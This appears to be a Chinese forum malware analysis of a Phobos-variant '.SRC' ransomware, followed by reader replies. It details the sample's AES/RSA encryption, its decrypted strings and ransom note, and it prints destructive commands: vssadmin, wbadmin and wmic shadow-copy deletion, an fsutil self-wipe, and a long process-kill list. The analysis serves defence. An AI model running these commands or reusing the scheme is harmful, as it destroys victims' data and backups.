标志:  0x1a
解密字符串:Kernel32.dll;Wow64DisableWow64FsRedirection;Wow64RevertWow64FsRedirection;Advapi32.dll;CreateProcessWithTokenW;
解密HEX: 4b65726e656c33322e646c6c3b576f77363444697361626c65576f77363446735265646972656374696f6e3b576f773634526576657274576f77363446735265646972656374696f6e3b41647661706933322e646c6c3b43726561746550726f6365737357697468546f6b656e573b0000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x1b
解密字符串:exe;dll;
解密HEX: 6500780065003b0064006c006c003b0000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x1e
解密字符串:finished
解密HEX: 66696e6973686564000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x1f
解密字符串:open
解密HEX: 6f00700065006e00000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x20
解密字符串:admin
解密HEX: 610064006d0069006e0000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x21
解密字符串:not admin
解密HEX: 6e006f0074002000610064006d0069006e000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x22
解密字符串:1. ID: %08X
2. %s

解密HEX: 31002e002000490044003a00200025003000380058000d000a0032002e002000250073000d000a00000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x23
解密字符串:%s (%08X)%c %I64d.%02I64d gb (%u)/%I64d.%02I64d gb (%u)/%u%%

解密HEX: 250073002000280025003000380058002900250063002000250049003600340064002e002500300032004900360034006400200067006200200028002500750029002f00250049003600340064002e002500300032004900360034006400200067006200200028002500750029002f0025007500250025000d000a0000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x24
解密字符串:3. Total: %I64d.%02I64d gb (%u)/%I64d.%02I64d gb (%u)/%u%%

解密HEX: 33002e00200054006f00740061006c003a002000250049003600340064002e002500300032004900360034006400200067006200200028002500750029002f00250049003600340064002e002500300032004900360034006400200067006200200028002500750029002f0025007500250025000d000a000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x25
解密字符串:X:\Users\All Users\Microsoft\Windows\Caches
解密HEX: 58003a005c00550073006500720073005c0041006c006c002000550073006500720073005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c0043006100630068006500730000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x26
解密字符串:ntdll.dll;NtQueryObject;NtQuerySystemInformation;RtlGetVersion;Kernel32.dll;GetFinalPathNameByHandleW;QueryFullProcessImageNameW;
解密HEX: 6e74646c6c2e646c6c3b4e7451756572794f626a6563743b4e74517565727953797374656d496e666f726d6174696f6e3b52746c47657456657273696f6e3b4b65726e656c33322e646c6c3b47657446696e616c506174684e616d65427948616e646c65573b517565727946756c6c50726f63657373496d6167654e616d65573b00000000000000000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x27
解密字符串:chrome;
解密HEX: 6300680072006f006d0065003b00000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x28
解密字符串:Users\Public;
解密HEX: 550073006500720073005c005000750062006c00690063003b00000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x29
解密字符串:iplogger.com
解密HEX: 69706c6f676765722e636f6d0000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x2a
解密字符串:/1JfuR4
解密HEX: 2f314a6675523400000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x2b
解密字符串:wininet.dll;HttpOpenRequestA;HttpSendRequestA;InternetOpenA;InternetCloseHandle;InternetConnectA;
解密HEX: 77696e696e65742e646c6c3b487474704f70656e52657175657374413b4874747053656e6452657175657374413b496e7465726e65744f70656e413b496e7465726e6574436c6f736548616e646c653b496e7465726e6574436f6e6e656374413b00000000000000000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x2c
解密字符串:%08X;%I64d.%02I64d
解密HEX: 253038583b25493634642e253032493634640000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x33
解密字符串:windows;winnt;\system32;\regedit.exe;
解密HEX: 770069006e0064006f00770073003b00770069006e006e0074003b005c00730079007300740065006d00330032003b005c0072006500670065006400690074002e006500780065003b0000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x36
解密字符串: .Y!
解密HEX: f32e592100000000000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x37
解密字符串: !@]
解密HEX: dc21405d00000000000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x38
解密字符串:%s /c ping 1.1.1.1 -n 5 & fsutil file setZeroData offset=0 length=131072 "%s" & del /q /f "%s"
解密HEX: 2500730020002f0063002000700069006e006700200031002e0031002e0031002e00310020002d006e0020003500200026002000660073007500740069006c002000660069006c00650020007300650074005a00650072006f00440061007400610020006f00660066007300650074003d00300020006c0065006e006700740068003d0031003300310030003700320020002200250073002200200026002000640065006c0020002f00710020002f0066002000220025007300220000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x39
解密字符串:\Microsoft\Windows\Network Shortcuts
解密HEX: 5c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c004e006500740077006f0072006b002000530068006f00720074006300750074007300000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x3a
解密字符串:Your files were encrypted!
Please contact us for decryption.
解密HEX: 596f75722066696c6573207765726520656e63727970746564210a506c6561736520636f6e7461637420757320666f722064656372797074696f6e2e00000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

4.1.5 配置初始化(sub_4068B0函数)

这里可以看到首先调用了sub_402680函数,然后又调用了sub_407B10函数来实现的对当前系统目录和当前运行程序的路径以及一些系统的特征文件夹进行获取。


进入到sub_402680函数可以看到主要就是调用了CryptAcquireContextW函数来实现对加密对象的初始化,这里依旧是和字符串解密函数用的是一样的加密类型,都是PROV_RSA_AES类型(0x18),不知道什么类型的,可以看下图:



接着就是将0x41f000地址处的加密字符串数据赋值到a1+8结构的位置,然后将解密标志为0xa的解密字符串给到a1+36结构的位置(这里0xa标志所解密的字符串既是所有后续所用的解密字符的密文,与后续的a有所区别)。大致了解到,该函数主要就是实现了对字符串解密结构的初始化

在完成了字符串解密的初始化以后,接着的就是调用sub_407B10函数来完成其他所需配置变量的初始化,进入到sub_407B10函数可以看到。

首先通过GetSystemWindowsDirectoryW函数实现了一下对C:/Windows路径的获取


调用GetModuleFileNameW函数实现对自身路径的获取


调用SHGetSpecialFolderPathW函数实现对C:\ProgramDataC:\Users\Admin\Desktop路径的获取


在完成了对数据的获取后,将要实现对字符串的解密然后初始化全局变量等


最后就是以分号分片该解密字符串,进行模块的加载。

Kernel32.dll;Wow64DisableWow64FsRedirection;Wow64RevertWow64FsRedirection;Advapi32.dll;CreateProcessWithTokenW;

4.1.6 初始化窗口程序内容(sub_406D70函数)

这里在分析之前,先对可视化的控件的ID做一下分析,以便于后续的分析,后续中的描述也会根据ID+控件类型来进行描述。


因为是纯Windows编写的GUI程序,这里可以找到DialogBoxParamW函数,直接分析其回调DialogFunc即可


进入到DialogFunc函数可以看到,其中a2为消息类型,其中有对窗口初始化、按钮点击、窗口关闭等。


这里先从a2 == 0x110,既WM_INITDIALOG初始化对话框的事件开始分析,首先主要就是初始化1005编辑框中的ID和鉴权的内容,然后将其设置到其中。这里可以看到,ID部分的生成主要是由get_ID(sub_408370)这个函数生成的。


进入到sub_408370这个函数可以看到,先解密了一下所需字符串,然后读取了SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductId的值,并且将其给到Data。

通过调用get_C_Volume_ID(sub_407C90)函数获取了一下C盘的卷序列号


进入get_C_Volume_ID函数可以看到,先解密字符串SystemDrive,然后获取了环境变量SystemDrive的值为C,接着调用GetVolumeInformationW函数获取该磁盘的卷序列号。


之后就是将序列号以“-%08x”的格式,拼接到产品ID的后面,再将其完整内容进行CRC32的计算,并返回。由此,该病毒的ID就生成了。

这里可以写个脚本计算一下,发现完全对的上。

import binascii
cipher1 = '00331-10000-00001-AA161-F8A08166'
print hex(binascii.crc32(cipher1)&0xffffffff)


完成了产品的ID的计算后,将进行编辑框内容的格式化,这里主要调用了format_ID_admin(sub_403660)函数实现


进入到format_ID_admin函数可以看到,先对前面检查启动权限的返回值来做了一下判断,如果是管理员权限,会将v1的值设为“admin”,如果不是管理员,v1的值将设为“not admin”。之后连带着前面生成的ID,一起格式化到“1. ID: %08X \n 2. %s”字符串中,来形成最后的内容。



完成了格式化内容后,就需要该内容传入到编辑框中,然后待后续显示。


这里会对byte_41A00Ebyte_40A00Dbyte_41A00F的值进行使用,将其设置成1012、1013和1015这几个checkbox的状态,如果为1则为选定状态,反之则为未被选定状态。


获取系统版本,来进行判断,是否是Windows Visa下面的版本,如果是就调用ShowWindow函数来实现。


激活系统热键CTRL+ALT+V来实现窗口的隐藏和显示



获取当前计算机的名称,显示到ID为1011的编辑框中


到此,所有的窗口内容的初始化就已经完成了。

4.1.7 执行加密(sub_406D70函数)

执行流程图:

开始分析:

运行程序可以知道,当Start按钮被按下时,会触发加密等操作,而这部分内容也在DialogFunc回调函数中实现


当a2等于0x111的时候,a3则变成了ID的值,通过switch case来实现触发各种控件事件,这里先找一下ID为1001的Start按钮的事件,找到如下内容。

首先在按下Start按钮后,会先获取一下1014编辑框中的内容长度,如果获取到的内容长度为0的话,则代表未指定加密路径,直接开创一个线程,调用sub_405690函数,如果读取到内容,则将其作为参数,调用sub_405580函数。


这里先进入sub_405690函数看一下实现,可以看到该函数主要就是个初始化函数,先调用sub_4033c0函数解密所用字符串和初始化对应结构以后,根据传入参数的值来进行判断选择部分执行内容,这里传入的值为2,故不执行第一个判断中的内容。


在执行完上面的判断后,会调用sub_4076b0函数实现对系统版本的判断,如果系统版本大于windows visawindows server 2008(**版本代表编号**)则开始执行加密流程。


这里进入到start_enc函数看一下具体的实现,首先可以看到,该函数会先调用sub_4012C0函数实现了系统磁盘驱动器的遍历,然后将其信息初始化到结构体后,接着就是调用produce_random_key来产生两个key,最后调用sub_4015D0函数实现将刚才生成的key拼接上固定值ID卷序列号等进行RSA加密(具体可以看密钥自加密实现部分),加密数据大小为128个字节。


完成了上述的密钥生成和加密后,将调用sub_404BC0函数来实现UAC的虚拟化的开启,最后调用exec_del_shadow函数实现命令执行,之后调用close_server函数来实现指定服务的关闭等,这里实现看下面的描述中会细说。

最后,在执行了前面的所有流程后,将执行文件的加密操作,调用sub_401820函数,开始加密当前目录


进入到sub_401820函数可以看到,首先会调用sub_401720函数来对a1参数进行校验,如果不通过就不执行后面的,直接退出。

这里进入到sub_401720函数看一下是如何校验的,从前面来看几乎就是一些赋值操作。

后来才是比较部分,取当前路径的前8位和path_obj对象中的path的值进行比较,判断是否一样,如果不一样就返回0,如果一样就返回完整路径。

因为这里我的路径不属于A-Z中任何一个盘,所以直接退出了,这里会继续向下,进入到sub_4019C0函数,开始遍历path_obj中的路径。

hTzlsbm5iXzE3MjkxNTM5MTc6MTcyOTE1NzUxN19WNA)

进入到sub_4019C0函数中可以看到,首先会判断一下path_obj对象是否为空


如果不为空,后面的实现其实sub_401820中的一样,二者唯一的不同就是前面的校验部分,一个是校验路径是否为本地的磁盘中的路径,一个是直接遍历本地磁盘。

接下来就是开始解密所用字符串了,这里解密了0xE0xF0x9这三个字符串,分别对应着0x400000x10chewbacca@cock.li**。**


之后就是将加密所用的信息初始化到参数结构体中,然后拼接加密后缀,拼接后缀所用的格式为

.[%08X].[%s].%s,其中三个参数为ID、勒索邮箱和加密文件后缀,例如:

.[F2479DE1].[chewbacca@cock.li].SRC


一切初始化完毕后,直接创建线程,调用StartAddress函数来实现对路径的遍历、过滤和加密等操作。


这里进入到StartAddress函数,可以看到具体实现,主要的加密实现在sub_402210函数中。


继续进入到sub_402210函数看一下实现。这里前面有一个sub_402030的部分没有说,因为该函数主要是个路径过滤函数,进入到sub_402210函数中还会再调用一次,所以就不再重复分析了。


进入到sub_402030函数可以看到具体的过滤实现,主要过滤了这几个关键词:

windows
winnt


之后就是下面的return的判断,主要过滤了以下关键词:

C:\Windows
C:\ProgramData\microsoft\windows\caches
C:\Users\All Users\Microsoft\Windows\Caches
Users\Public
C:\\ProgramData
C:\\Users

完成了过滤后,就要开始遍历该路径下的文件夹和文件了,主要通过FindFirstFileW函数加通配符的方式实现该路径下所有文件的遍历


开始校验,开始主要对文件名称做了简单校验,判断其开头是否为...的情况,并且文件名不得为空。


之后就会开始调用check_filename函数,来实现文件名和文件后缀的校验。进入到check_filename函数可以看到具体实现,首先就是获取文件后缀


校验文件的类型,判断是否是系统文件

开始比较,如果遇到exedllSRC为文件后缀,则不加密,如果文件名为以下内容也不加密。

过滤文件名:

boot.ini
bootfont.bin
ntldr
ntdetect.com
io.sys
+README-WARNING+.txt
desktop.ini


在文件过滤完毕后,会判断文件大小是否小于等于0x4000字节大小,如果小于等于就将flag3[2]的值设置为1

反之为0


接着会判断文件的属性是否为只读,如果文件属性是只读就将结构中flag3[3]位置的值设置为1


最后就要开始进行文件的加密操作,可以看到文件加密由encfile(sub_403C100)函数实现

进入到enc_file函数可以看到具体实现,首先会对标志进行校验,然后将文件名给到v4,之后就是针对文件的只读属性进行处理,如果是待加密文件是只读文件,那么就将其权限修改为可读可写。


打开文件的IO流


调用check_file_last函数来检查一下文件末尾的标志是否存在,以判断是否是个正常的文件。


进入到check_file_last函数可以看到具体实现,主要检查末尾四字节的内容是否是21592EF3(HEX),如果代表文件是加密的文件,就不需要进行加密,直接跳过。


如果末尾4字节的标志不是21592EF3,那么就要进行加密。首先会根据文件的大小进行判断,如果大于0x40000字节的文件选择sub_4044E0函数进行加密,小于等于0x40000字节的文件选择sub_403EE0函数进行加密。这里的加密的详细,在文件加密板块来仔细分析。


加密完成后,将对文件的名称进行修改,拼接上勒索后缀。


最后调用MoveFileW函数实现文件名称的修改


如果文件是只读文件,加密完毕后,会将文件属性再修改回去。


全部的文件加密完成后,v35会进行自增,代表加密文件数量+1,然后开始读取该目录下的其他文件。


当所有的文件读取完毕后,将进行勒索信的写入


勒索信的写入主要实现函数为sub_408BC0函数,在写入完毕后就会关闭文件流。这里的勒索信的写入函数在勒索信写入部分会做详细分析。

到此,大部分的加密流程就分析完毕。

4.1.8 磁盘遍历(sub_4012C0函数)

调用SetErrorMode函数实现修改错误模式,让系统不显示错误对话框。


获取系统物理磁盘,并且获取ID的值


循环遍历A-Z,然后将存在的磁盘结构插入到a1参数对象中,这里的判断磁盘是否存在的依据是是否能获取到磁盘的卷序列号,如果能够获取到则继续,否则就下一个。


这里在结构部分根据数据的类型,可以创建一个结构体,看的比较清晰。

path_obj:

struct path_obj
{
  WCHAR path;
  __declspec(align(16)) _DWORD unknow_felds;
  _DWORD VolumeSerialNumber;
  _DWORD ID;
  _DWORD DriveType;
};

遍历完毕之后,从内存中可以看到a1结构体对象的形式,分别为磁盘的数量和指向path_obj的指针。


其中磁盘指针对应的两个path_obj


对应的path_obj:


到这里,系统磁盘的遍历就结束了。

4.1.9 密钥生成(produce_random_key函数)

该函数的具体调用请看执行加密部分,这里主要介绍一下该函数的实现等。这里可以根据磁盘遍历部分的内容生成的结构体来看比较好便于理解。

进入到密钥生成内部,可以看到这里会循环前面磁盘遍历结构体中所存的磁盘结构(path_obj)。先调用CryptAcquireContextW**函数初始化了一个加密对象,类型和前面加解密字符串用的一样,然后调用随机数生成器CryptGenRandom**函数生成了32位的随机字符串,当做加密所用的Key。


但是这里会生成两个Key,方法其实一样。


分别存储在对应的加密磁盘结构下的偏移32和偏移40的位置


这里就可以重新修改一下path_obj的结构体了:

struct struct_v8
{
  WCHAR path;
  __declspec(align(16)) _DWORD unknow_felds;
  _DWORD VolumeSerialNumber;
  _DWORD ID;
  _DWORD DriveType;
  _DWORD first_produce_key;
  _DWORD first_produce_key_encdata;
  _DWORD second_produce_key;
  _DWORD second_produce_key_encdata;
};


最后分析下来可以知道,一个磁盘对象path_obj分别对应着两个不同的key

4.1.10 密钥自加密(sub_4015D0函数)

这里会先解密一个0x37标志对应的字符串dc21405d(hex形式),是一个固定值


然后开始遍历所有的path_obj对象,将其中的信息提取出来,按照格式:

固定值 + ID + VolumeSerialNumber + DriveType + Key

进行拼接后计算其CRC32,然后再将CRC32后的值拼接到末尾,组成一个完整的字符串,

固定值 + ID + VolumeSerialNumber + DriveType + Key + CRC32

最后调用RSA_encode函数实现RSA的加密,构成一个128字节大小的密文。


最后将RSA的加密结果放到path_objfirst_produce_key_encdatasecond_produce_key_encdata的对象中。

4.1.11 RSA加密(sub_402750函数)

RSA加密其实很简单,进入到RSA_encode函数就能看到实现,其实整体就是通过CryptAcquireContextW初始化加密对象,然后CryptImportKey函数导入加密密钥,最后由CryptEncrypt函数实现加密,算法的识别也是一样,从该密钥的Blob结构就可以很清楚的看出是RSA类型的加密。


其中RSA的公钥是由字符串解密标志0xa所解密的字符串,值为:

0602000000a400005253413100040000010001001d35622bcfbcfe4fde59eae15c05d7528d0c1ae6755c180904dd745cd1f5a19986fce1e0e9534595e4fb7bdd6d5cc1f2cee684851bfc59529108c433185cf76c800f421aad345aa6a964e8f485acf1d3965c85654b124257e0142269eab809af68692309843ce7cd4fa8bf3124926f0403a7502abbecfa2ba7504e63a958e7bd000000000000000000000000

4.1.12 文件加密(sub_4044E0函数\sub_403EE0函数)

这里sub_4004e0函数是文件大小大于0x40000字节大小的文件所采用的加密函数,sub_403ee0函数是文件大小小于等于0x40000字节大小的文件所采用的加密函数。

encrypto_big_file(sub_4044E0函数)

进入到函数中,可以看到具体的实现。首先获取文件的大小,然后除3,将生成的值给到结构体的file_size_low变量中,再给到pdwDataLen。

调用produce_random函数生成IV,这里就不再重复描述IV的生成过程,下面的那个encrypto_small_file函数中有做说明。

生成了IV后,会根据flag的值,来选择使用第一个还是第二个密钥,这里因为flag为1,故选择第一个密钥,最后调用sub_402AC0函数将IV和KEY导入到加密对象中(这里的导入函数也不再重复描述)


再导入完毕加密密钥和IV后,开始根据文件名的大小来计算结构大小,并且16字节对齐。


之后就是将信息赋值给文件名称的结构体中,调用CryptoEncrypt函数对结构体内容进行加密。结构体的内容跟encrypto_small_file函数有所不同的是前三部分的padding部分,后面因为大致相同就没有再次创建一个结构体。

结构:

min_size` +  `filesize / 3的值` +`0`+ `filesize` + `文件名长度` + `文件名`+ `前面所有信息的CRC32


加密了文件名信息的结构体的内容后,会销毁加密对象,然后就是开始往文件的末尾写入数据。

文件后缀写入完成后,将开始加密文件内容,先移动文件指针到文件内容的开头,然后调用sub_404400函数实现文件内容的加密操作。


进入到sub_404400函数可以看到具体的加密实现,先读取min_size(0x40000)字节大小的数据,然后加密,最后写入到原文件中,整体就加密完毕了,使用的算法也是AES加密算法,加密模式依旧是CBC模式的。


加密完成后,销毁加密对象,然后返回。

encrypto_small_file(sub_403EE0函数)

进入到函数中,可以看到具体的实现。首先该函数会调用produce_random函数生成一个16位的随机数,当做IV。


进入到produce_random函数可以看到IV的产生过程,先初始化了一下加密对象,类型为0x18


调用SetFilePointerEx函数将文件指针移动到文件末尾,然后计算文件的大小,然后做16字节的对齐操作,不够的字节调用memset函数\x00字符写入到文件中补齐。


根据path_obj中的flag的值来选择用第几个密钥,这里flag为1,故选择生成的第一个密钥,之后就是调用sub_402AC0函数将Key和IV导入到加密对象中。


进入到sub_402AC0函数可以看到具体实现,就是很常规的利用CryptImportKey导入密钥。


完成了加密对象的初始化后,这里先创建一个结构体,会比较好看

struct filename_struct
{
  _DWORD padding1;
  _DWORD padding2;
  _DWORD padding3;
  _DWORD file_size;
  _DWORD padding5;
  _DWORD filename_len;
  _DWORD file_name;
};

这里会先对文件名称的大小+28字节后的大小进行16字节的对齐计算,这个28是什么看下面即可。


得到了计算后的大小后,利用HeapAlloc函数创建指定大小的空间,用于存储上面的结构体。这里28就是结构体中,除了文件大小以外的信息所用的大小。之后还是很老的操作,将文件该结构体中的内容:00填充+文件大小+文件名称长度+文件名计算一下CRC32,然后将CRC32结果拼接到后面构成一个完整的数据,再调用enc_data函数将其加密。


进入到enc_data函数可以很明显看到,就是个加密,用的IV和KEY都是刚才初始化加密对象所用的,故这里用了AES的加密算法,加密模式是CBC。


将文件名等信息进行加密了以后,会销毁加密对象,然后将文件指针移动到文件末尾,将加密所用的配置信息写入到文件末尾,分别有加密文件大小、文件名称的加密数据、文件名称的加密数据长度和IV写入到文件末尾。


之后继续写入密钥的加密数据、固定值和加密文件的标志。


加密信息写入完毕后,调用sub_402AC0函数实现加密对象的KEY和IV的导入,判断已加密文件的大小是否大于等于文件大小,既判断是否加密完成,如果不等于就继续下面的加密,如果不等于就销毁加密对象,然后移动文件指针到文件末尾,在文件末尾写入8个FF字节。


这里因为一开始加密,所以已加密文件的大小为0,故直接走下面的加密流程。

开始移动文件指针到文件的开头,计算剩余加密大小,这里因为已经加密的大小为0,故剩余加密大小就是文件大小。最后判断一下如果剩余加密大小小于最小加密数据块(16字节),就将剩余加密大小设置为16字节,然后读取剩余加密大小的数据到read_buffer中。


检查读取的数据大小是否符合16字节对齐,如果没有对齐,就用00字节补齐。


开始调用enc_data函数read_buffer中的全部数据进行加密,并且移动文件指针到文件开头,写入全部的加密数据到文件中,最后更新已加密数据的大小。


完成加密操作以后,对加密的字节大小进行校验,判断是否需要再次加密,如果已经加密的大小小于文件大小,代表还有内容未被加密,就继续循环加密,否则就结束加密。


所有文件内容加密完成后,将销毁加密对象,然后在文件内容后追加写入8位FF字节。


在文件内容中体现:


加密完毕后,然后销毁加密对象,释放资源,最后返回。

4.1.13 勒索信写入(sub_408BC0函数)

该函数会先解密所用字符串+README-WARNING+.txtYOUR_FILES_ARE_ENCRYPTED::: Greetings ::: (太多只展示部分勒索信内容)


这里会判断是否指定勒索信的写入路径,如果指定了写入路径就调用write_random_note函数实现勒索信的写入


这里进入到write_random_note函数可以看到具体的实现,会根据是否是管理员的权限,来选择是否要调用CreateDirectoryW函数来实现目录的创建,然后再调用wirte_ransom_note函数写入。


这里进入到wirte_ransom_note函数来看一下具体的实现,基本上就是个简单的路径拼接,然后将勒索信内容写入到该路径中。

在勒索信写入完毕后,将释放资源,然后返回。

4.1.14 勒索信壁纸替换(sub_4084E0函数)

首先会获取设备上的屏幕信息


然后根据屏幕的大小创建一个指定大小的画布,然后解密勒索壁纸所显示的信息。


将勒索信息绘制到画布上,设置画布的背景颜色等


获取临时目录的路径,创建临时文件,临时文件名拼接.bmp后缀形成临时图像文件,再将画布图像写入到该临时图像文件中

调用SystemParametersInfoW函数,将壁纸路径修改为刚才创建的临时图像文件,实现壁纸的修改。


完成了壁纸的替换后,释放资源等


最后可以在temp目录下,可以找到这个文件。

4.1.15 系统影卷删除(exec_del_shadow函数)

这个函数整体就比较简单,解密完了所用命令,然后送入shell_exec函数执行就结束了,执行的命令:

vssadmin delete shadows /all /quiet
wbadmin delete catalog -quiet
wmic shadowcopy delete
exit

4.1.16 停止指定服务(close_server函数)

该函数也整体比较简单,首先解密一下所有指定的服务的可执行文件名,然后格式化到列表中。指定的服务可执行文件名:

sqlbrowser.exe
sqlwriter.exe
sqlservr.exe
msmdsrv.exe
MsDtsSrvr.exe
sqlceip.exe
fdlauncher.exe
Ssms.exe
sqlagent.exe
fdhost.exe
ReportingServicesService.exe
msftesql.exe
pg_ctl.exe
postgres.exe
UniFi.exe
armsvc.exe
IntelCpHDCPSvc.exe
OfficeClickToRun.exe
DellOSDService.exe
DymoPnpService.exe
Agent.exe
FJTWMKSV.exe
IPROSetMonitor.exe
IRMTService.exe
MBCloudEA.exe
QBCFMonitorService.exe
QBIDPService.exe
RstMwService.exe
TeamViewer_Service.exe
dasHost.exe
IntelCpHeciSvc.exe
RAVBg64.exe
vds.exe
unsecapp.exe
TodoBackupService.exe
MediaButtons.exe
IAStorDataMgrSvc.exe
jhi_service.exe
LMS.exe
DDVDataCollector.exe
DDVCollectorSvcApi.exe
TeamViewer.exe
tv_w32.exe
tv_x64.exe
Microsoft.Photos.exe
MicrosoftEdge.exe
ApplicationFrameHost.exe
browser_broker.exe
MicrosoftEdgeSH.exe
MicrosoftEdgeCP.exe
RtkNGUI64.exe
WavesSvc64.exe
OneDrive.exe
DYMO.DLS.Printing.Host.exe
FtLnSOP.exe
FjtwMkup.exe
FTPWREVT.exe
FTErGuid.exe
qbupdate.exe
QBWebConnector.exe
ShellExperienceHost.exe
RuntimeBroker.exe
IAStorIcon.exe
PrivacyIconClient.exe
SupportAssistAgent.exe
SecurityHealthService.exe
taskhostw.exe
taskhosta.exe
wijca.exe
ktfwswe.exe
HeciServer.exe
mdm.exe
ULCDRSvr.exe
WLIDSVC.EXE
WLIDSVCM.EXE
GoogleCrashHandler.exe
GoogleCrashHandler64.exe
RAVCpl64.exe
igfxtray.exe
hkcmd.exe
igfxpers.exe
PsiService_2.exe
UNS.exe
taskeng.exe
AdobeARM.exe
LenovoReg.exe
dwm.exe
wuauclt.exe
avp.exe
FBService.exe
LBAEvent.exe
PDFProFiltSrvPP.exe
avpsus.exe
klnagent.exe
vapm.exe
ScanToPCActivationApp.exe
BrStMonW.exe
BrCtrlCntr.exe
concentr.exe
redirector.exe
BrccMCtl.exe
BrYNSvc.exe
Receiver.exe
BrCcUxSys.exe
LSCNotify.exe
SelfServicePlugin.exe
wfcrun32.exe
HPNETW~1.EXE
HPScan.exe
taskhost.exe
Teams.exe
AuthManSvr.exe
WLXPhotoGallery.exe
outlook.exe
prevhost.exe
excel.exe
chrome.exe
AcroRd32.exe
RdrCEF.exe
vssadmin.exe
WmiPrvSE.exe
oracle.exe
ocssd.exe
dbsnmp.exe
synctime.exe
agntsrvc.exe
mydesktopqos.exe
isqlplussvc.exe
xfssvccon.exe
mydesktopservice.exe
ocautoupds.exe
encsvc.exe
firefoxconfig.exe
tbirdconfig.exe
ocomm.exe
mysqld.exe
mysqld-nt.exe
mysqld-opt.exe
dbeng50.exe
sqbcoreservice.exe
infopath.exe
msaccess.exe
mspub.exe
onenote.exe
powerpnt.exe
steam.exe
thebat.exe
thebat64.exe
thunderbird.exe
visio.exe
winword.exe
wordpad.exe


然后开始调用Process32FirstW函数来遍历当前运行的所有进程,并且获取其中对应的可执行文件,用于后续的比对,如果一样就调用TerminateProcess函数结束该进程,如果不一样就调用Process32NextW函数遍历下一个。

4.1.17 自删除(sub_407890函数)

通过读取环境变量ComSpec的值来获取cmd.exe的位置


将获取到的cmd.exe的路径和自身可执行文件路径拼接到解密标志0x38解密后的字符串中,形成完整的命令:

C:/Windows/System32/cmd.exe /c ping 1.1.1.1 -n 5 & fsutil file setZeroData offset=0 length=131072 encode.exe & del /q /f encode.exe


执行刚才的命令,实现对加密器的删除。

5.病毒分析概览

本次分析揭示了 Phobos 勒索病毒家族最新变种体SRC勒索程序的攻击手法和加密特征。该病毒主要使用 AES 和 RSA 结合的双重加密算法,以对文件加密并生成唯一标识符,同时更改文件扩展名.SRC。AES算法对文件内容进行快速加密,而 RSA 则用于加密 AES 密钥,使解密过程更具挑战性。攻击者通过伪装合法文件绕过检测,并附带勒索信索取比特币。

免费评分

参与人数 2吾爱币 +2 热心值 +2 收起 理由
allspark + 1 + 1 用心讨论,共获提升!
kkkfew + 1 + 1 热心回复!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

沙发
xdloveu52 发表于 2024-10-19 01:21
这菜好硬啊!!!感谢分享!
3#
shaokui123 发表于 2024-10-19 12:27
4#
 楼主| solar应急响应 发表于 2024-10-19 20:32 |楼主

您好,暂时没有技术层面的破解办法,只能找黑客购买解密工具。
5#
Emanuel 发表于 2024-10-19 22:49

不能解密吗
6#
nzy8513 发表于 2024-10-20 07:55
大佬厉害了
7#
 楼主| solar应急响应 发表于 2024-10-20 14:30 |楼主

您好,暂时没有技术层面的破解办法,只能找黑客购买解密工具。
8#
zhaublitz 发表于 2024-10-21 10:11
啥时候能分析下mallox这个勒索呢?
9#
 楼主| solar应急响应 发表于 2024-10-21 12:48 |楼主
zhaublitz 发表于 2024-10-21 10:11
啥时候能分析下mallox这个勒索呢?

您好,这个我们分析过了,而且他的Linux版本和windows版本有一部分老版本我们也实现了成功破解,预计在近期会发布相关分析文章和破解文章,您可以后面关注下。
10#
rbj520 发表于 2024-10-31 18:03
這個學習有難度,感謝分享
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-12-12 15:07

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表